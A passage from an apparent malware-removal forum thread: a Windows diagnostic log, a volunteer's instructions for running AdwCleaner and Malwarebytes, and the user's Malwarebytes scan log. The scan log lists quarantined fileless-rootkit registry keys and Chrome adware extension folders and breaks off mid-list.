Error: (07/17/2019 08:08:48 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program CCleaner64.exe version 5.21.0.5700 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: a88
 
Start Time: 01d53ca09a6bca9a
 
Termination Time: 0
 
Application Path: C:\Program Files\CCleaner\CCleaner64.exe
 
Report Id: f26d8e83-a893-11e9-839d-dc85de74e30e
 
Error: (07/17/2019 08:06:41 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (07/14/2019 08:06:07 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (07/12/2019 09:08:42 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (07/11/2019 06:42:53 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (07/10/2019 10:33:11 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (07/10/2019 03:36:43 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: TrustedInstaller.exe, version: 6.1.7601.17514, time stamp: 0x4ce7989b
Faulting module name: ntdll.dll, version: 6.1.7601.24499, time stamp: 0x5d0115b0
Exception code: 0xc0000005
Fault offset: 0x000000000002a1ff
Faulting process id: 0x5b8
Faulting application start time: 0x01d536f97c916c54
Faulting application path: C:\Windows\servicing\TrustedInstaller.exe
Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
Report Id: d831c718-a2ed-11e9-9a6a-60a44c3dd8c8
 
 
System errors:
=============
Error: (07/17/2019 08:12:06 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Update service hung on starting.
 
Error: (07/17/2019 08:08:17 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Microsoft .NET Framework NGEN v4.0.30319_X86 service to connect.
 
Error: (07/17/2019 08:05:17 AM) (Source: iaStor) (EventID: 9) (User: )
Description: The device, \Device\Ide\iaStor0, did not respond within the timeout period.
 
Error: (07/17/2019 08:05:16 AM) (Source: iaStor) (EventID: 9) (User: )
Description: The device, \Device\Ide\iaStor0, did not respond within the timeout period.
 
Error: (07/17/2019 08:05:16 AM) (Source: iaStor) (EventID: 9) (User: )
Description: The device, \Device\Ide\iaStor0, did not respond within the timeout period.
 
Error: (07/17/2019 08:05:14 AM) (Source: iaStor) (EventID: 9) (User: )
Description: The device, \Device\Ide\iaStor0, did not respond within the timeout period.
 
Error: (07/17/2019 08:05:13 AM) (Source: iaStor) (EventID: 9) (User: )
Description: The device, \Device\Ide\iaStor0, did not respond within the timeout period.
 
Error: (07/17/2019 08:05:22 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 8:20:35 PM on ‎7/‎14/‎2019 was unexpected.
 
 
Windows Defender:
===================================
Date: 2019-01-23 21:23:31.336
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version:1.285.6.0
Previous Signature Version:1.283.3544.0
Update Source:User
Signature Type:AntiSpyware
Update Type:Full
Current Engine Version:1.1.15600.4
Previous Engine Version:1.1.15600.4
Error code:0x8050a005
Error description:The program can't find definition files that help detect unwanted software. Check for updates to the definition files, and then try again. For information on installing updates, see Help and Support. 
 
Date: 2018-04-05 00:58:28.414
Description: 
Windows Defender has encountered an error trying to load signatures and will attempt reverting back to a known-good set of signatures.
Signatures Attempted:Current
Error Code:0x80070002
Error description:The system cannot find the file specified. 
Signature version:0.0.0.0
Engine version:0.0.0.0
 
Date: 2018-04-05 00:58:28.398
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version:
Previous Signature Version:
Update Source:Signature Update Folder
Signature Type:AntiSpyware
Update Type:Delta
Current Engine Version:
Previous Engine Version:
Error code:0x80070002
Error description:The system cannot find the file specified. 
 
CodeIntegrity:
===================================
 
Date: 2019-07-17 09:09:25.493
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-07-17 08:58:04.512
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-07-17 08:52:08.960
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-07-17 08:41:00.488
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-07-17 08:14:50.136
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-07-14 20:21:06.014
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-07-14 20:12:22.660
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-07-13 17:16:07.742
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
==================== Memory info =========================== 
 
BIOS: American Megatrends Inc. 1708 11/09/2012
Motherboard: ASUSTeK COMPUTER INC. P8Z77-V PRO
Processor: Intel(R) Core(TM) i5-3570K CPU @ 3.40GHz
Percentage of memory in use: 51%
Total physical RAM: 8132.69 MB
Available physical RAM: 3942.15 MB
Total Virtual: 16263.52 MB
Available Virtual: 11966.72 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:931.41 GB) (Free:603.24 GB) NTFS
Drive d: (Madame Fate EN) (CDROM) (Total:0.22 GB) (Free:0 GB) UDF
 
\\?\Volume{ea62f4d6-84bc-11e2-a5b9-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: E4B0DEA2)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================
 

 

Hello kitzie and welcome to WTT.

My name is Satchfan and I would be glad to help you with your computer problem.

Please read the following guidelines which will help to make cleaning your machine easier:

  • please follow all instructions in the order posted
  • please continue to review my answers until I tell you your machine appears to be clear. Absence of symptoms does not mean that everything is clear
  • all logs/reports, etc. must be posted in Notepad. Please ensure that word wrap is unchecked. In Notepad click Format, uncheck Word wrap if it is checked
  • if you don't understand something, please don't hesitate to ask for clarification before proceeding
  • the fixes are specific to your problem and should only be used for this issue on this machine.
  • please reply within 3 days. If you do not reply within this period I will post a reminder but topics with no reply in 4 days will be closed!

IMPORTANT:

Please DO NOT install/uninstall any programs unless asked to.
Please DO NOT run any scans other than those requested

===================================================

Note: Please complete these tasks in the order given in the instructions.

===================================================

Download and run AdwCleaner

Download AdwCleaner from here and save it to your desktop.

  • run AdwCleaner by clicking on Scan Now
  • when it has finished, leave everything that was found checked, (ticked), then click on Clean and Repair
  • if it asks to reboot, allow the reboot
  • on reboot a log will be produced; please attach the content of the log to your next reply.

===================================================

Run Malwarebytes Anti-Malware

Please download and run the installer for Malwarebytes 3.0.

  • follow the prompts to install the program, (Malwarebytes 3.0 will automatically upgrade Malwarebytes Anti-Malware 2.x to Malwarebytes 3.0)
    • Launch Malwarebytes Anti-Malware
    • a 14 day trial of the Premium features is pre-selected: deselect this if you don’t want it, (it won’t diminish the scanning and removal capabilities of the program).
  • click Finish.
  • on the Dashboard, click Update Now
  • after the update completes, click the Scan Now' button.
  • if an update is available, clicking the Update Now button will update it
  • a Threat Scan will begin.
  • when the scan is complete, if malware has been detected, click Apply Actions to allow MBAM to clean what was found
  • when the prompt to restart the computer appears, click Yes.
  • after the restart once you are back at your desktop, open MBAM once more
  • click on the ‘History’ tab, the ‘Application Logs’
  • double-click on the scan log which shows the date and time of the scan just performed.
  • click Copy to Clipboard
  • please paste the contents of the clipboard into your reply.

Logs to include with the next post:

AdwCleaner log
Mbam.txt


Thanks

Satchfan

 

here are the logs 

 

   Malwarebytes

www.malwarebytes.com
 
-Log Details-
Scan Date: 7/19/19
Scan Time: 11:49 AM
Log File: 385e062e-aa45-11e9-8a3b-60a44c3dd8c8.json
 
-Software Information-
Version: 3.8.3.2965
Components Version: 1.0.613
Update Package Version: 1.0.11632
License: Trial
 
-System Information-
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: richard-PC\richard
 
-Scan Summary-
Scan Type: Threat Scan
Scan Initiated By: Manual
Result: Completed
Objects Scanned: 256862
Threats Detected: 372
Threats Quarantined: 372
Time Elapsed: 5 min, 20 sec
 
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect
 
-Scan Details-
Process: 0
(No malicious items detected)
 
Module: 0
(No malicious items detected)
 
Registry Key: 7
Rootkit.Fileless.MTGen, HKU\S-1-5-21-441904776-594677368-125994074-1001_Classes\duvremi\SHELL\OPEN\COMMAND, Quarantined, [6302], [443824],1.0.11632
Rootkit.Fileless.MTGen, HKU\S-1-5-21-441904776-594677368-125994074-1001_Classes\db3bfc\SHELL\OPEN\COMMAND, Quarantined, [6302], [261828],1.0.11632
Rootkit.Fileless.MTGen, HKU\S-1-5-21-441904776-594677368-125994074-1001_Classes\oforah\SHELL\OPEN\COMMAND, Quarantined, [6302], [261828],1.0.11632
Rootkit.Fileless.MTGen, HKU\S-1-5-21-441904776-594677368-125994074-1001_Classes\787e\SHELL\OPEN\COMMAND, Quarantined, [6302], [261830],1.0.11632
Rootkit.Fileless.MTGen, HKU\S-1-5-21-441904776-594677368-125994074-1001_Classes\c4ce\SHELL\OPEN\COMMAND, Quarantined, [6302], [261830],1.0.11632
PUP.Optional.DeskBar, HKLM\SOFTWARE\MICROSOFT\TRACING\DeskBarBundler_RASAPI32, Quarantined, [2115], [246292],1.0.11632
PUP.Optional.DeskBar, HKLM\SOFTWARE\MICROSOFT\TRACING\DeskBarBundler_RASMANCS, Quarantined, [2115], [246292],1.0.11632
 
Registry Value: 14
PUP.Optional.MindSpark, HKU\S-1-5-21-441904776-594677368-125994074-1001\SOFTWARE\GOOGLE\CHROME\PREFERENCEMACS\Default\extensions.settings|mabloidgodmbnmnhoenmhlcjkfelomgp, Quarantined, [636], [182487],1.0.11632
PUP.Optional.PrivacySwitch, HKU\S-1-5-21-441904776-594677368-125994074-1001\SOFTWARE\GOOGLE\CHROME\PREFERENCEMACS\Default\extensions.settings|ejnoifmdngghahakfdlpbfllmodapmlo, Quarantined, [2371], [347109],1.0.11632
Rootkit.Fileless.MTGen, HKU\S-1-5-21-441904776-594677368-125994074-1001_Classes\duvremi\SHELL\OPEN\COMMAND|, Quarantined, [6302], [443824],1.0.11632
Rootkit.Fileless.MTGen, HKU\S-1-5-21-441904776-594677368-125994074-1001_Classes\db3bfc\SHELL\OPEN\COMMAND|, Quarantined, [6302], [261828],1.0.11632
Rootkit.Fileless.MTGen, HKU\S-1-5-21-441904776-594677368-125994074-1001_Classes\oforah\SHELL\OPEN\COMMAND|, Quarantined, [6302], [261828],1.0.11632
Rootkit.Fileless.MTGen, HKU\S-1-5-21-441904776-594677368-125994074-1001_Classes\787e\SHELL\OPEN\COMMAND|, Quarantined, [6302], [261830],1.0.11632
Rootkit.Fileless.MTGen, HKU\S-1-5-21-441904776-594677368-125994074-1001_Classes\c4ce\SHELL\OPEN\COMMAND|, Quarantined, [6302], [261830],1.0.11632
Trojan.Fileless.MTGen, HKU\S-1-5-21-441904776-594677368-125994074-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^AYJQYNCT, Quarantined, [6571], [262349],1.0.11632
Trojan.Fileless.MTGen, HKU\S-1-5-21-441904776-594677368-125994074-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^XFHB, Quarantined, [6571], [262349],1.0.11632
PUP.Optional.Spigot.Generic, HKU\S-1-5-21-441904776-594677368-125994074-1001\SOFTWARE\GOOGLE\CHROME\PREFERENCEMACS\Default\extensions.settings|nhkpbpdabcamdnnfbnipmllcppibnaha, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Searchweb.Generic, HKU\S-1-5-21-441904776-594677368-125994074-1001\SOFTWARE\GOOGLE\CHROME\PREFERENCEMACS\Default\extensions.settings|gcaidkbhmgafpojklejljicnpnfnaokm, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Filmsfetcher, HKU\S-1-5-21-441904776-594677368-125994074-1001\SOFTWARE\GOOGLE\CHROME\PREFERENCEMACS\Default\extensions.settings|hceaclbnbpdcofjcefkffolobgealmlf, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.SeenOnScreen, HKU\S-1-5-21-441904776-594677368-125994074-1001\SOFTWARE\GOOGLE\CHROME\PREFERENCEMACS\Default\extensions.settings|ljnpocppiglgfcihjgapllpdcjppjgmo, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.MySearch, HKU\S-1-5-21-441904776-594677368-125994074-1001\SOFTWARE\GOOGLE\CHROME\PREFERENCEMACS\Default\extensions.settings|kdjggbdjkcmbonmclbnnpmfgiphfkmdj, Quarantined, [120], [443207],1.0.11632
 
Registry Data: 0
(No malicious items detected)
 
Data Stream: 0
(No malicious items detected)
 
Folder: 74
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\_locales\en, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\_metadata, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\_locales, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\config, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\icons, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Local Extension Settings\mabloidgodmbnmnhoenmhlcjkfelomgp, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Extension Settings\mabloidgodmbnmnhoenmhlcjkfelomgp, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\MABLOIDGODMBNMNHOENMHLCJKFELOMGP, Quarantined, [636], [182487],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejnoifmdngghahakfdlpbfllmodapmlo\1.6_0\about\css, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejnoifmdngghahakfdlpbfllmodapmlo\1.6_0\about\img, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejnoifmdngghahakfdlpbfllmodapmlo\1.6_0\_metadata, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejnoifmdngghahakfdlpbfllmodapmlo\1.6_0\scripts, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejnoifmdngghahakfdlpbfllmodapmlo\1.6_0\images, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejnoifmdngghahakfdlpbfllmodapmlo\1.6_0\about, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejnoifmdngghahakfdlpbfllmodapmlo\1.6_0, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Local Extension Settings\ejnoifmdngghahakfdlpbfllmodapmlo, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\EJNOIFMDNGGHAHAKFDLPBFLLMODAPMLO, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.Spigot.Generic, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Extension Settings\nhkpbpdabcamdnnfbnipmllcppibnaha, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhkpbpdabcamdnnfbnipmllcppibnaha\1.1_0\_locales\en, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhkpbpdabcamdnnfbnipmllcppibnaha\1.1_0\html\popup, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhkpbpdabcamdnnfbnipmllcppibnaha\1.1_0\_metadata, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhkpbpdabcamdnnfbnipmllcppibnaha\1.1_0\js\popup, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhkpbpdabcamdnnfbnipmllcppibnaha\1.1_0\_locales, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhkpbpdabcamdnnfbnipmllcppibnaha\1.1_0\newtab, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhkpbpdabcamdnnfbnipmllcppibnaha\1.1_0\html, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhkpbpdabcamdnnfbnipmllcppibnaha\1.1_0\css, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhkpbpdabcamdnnfbnipmllcppibnaha\1.1_0\js, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhkpbpdabcamdnnfbnipmllcppibnaha\1.1_0, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\NHKPBPDABCAMDNNFBNIPMLLCPPIBNAHA, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Searchweb.Generic, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Local Extension Settings\gcaidkbhmgafpojklejljicnpnfnaokm, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcaidkbhmgafpojklejljicnpnfnaokm\1.1.18.508_0\newtab\vendor\jquery, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcaidkbhmgafpojklejljicnpnfnaokm\1.1.18.508_0\newtab\vendor, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcaidkbhmgafpojklejljicnpnfnaokm\1.1.18.508_0\_metadata, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcaidkbhmgafpojklejljicnpnfnaokm\1.1.18.508_0\newtab, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcaidkbhmgafpojklejljicnpnfnaokm\1.1.18.508_0\icons, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcaidkbhmgafpojklejljicnpnfnaokm\1.1.18.508_0, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\GCAIDKBHMGAFPOJKLEJLJICNPNFNAOKM, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\icons\weather, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\external, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\chrome, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\common, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\search, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\external, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\images, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\fonts, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\icons, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\_metadata, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\css, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\HCEACLBNBPDCOFJCEFKFFOLOBGEALMLF, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.SeenOnScreen, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo\29.15_0\settings\partner, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo\29.15_0\settings\common, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo\29.15_0\content_script, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo\29.15_0\_metadata, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo\29.15_0\settings, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo\29.15_0\common, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo\29.15_0\newtab, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo\29.15_0\revert, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo\29.15_0\logo, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo\29.15_0, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\LJNPOCPPIGLGFCIHJGAPLLPDCJPPJGMO, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\settings\partner, Quarantined, [120], [443207],1.0.11632
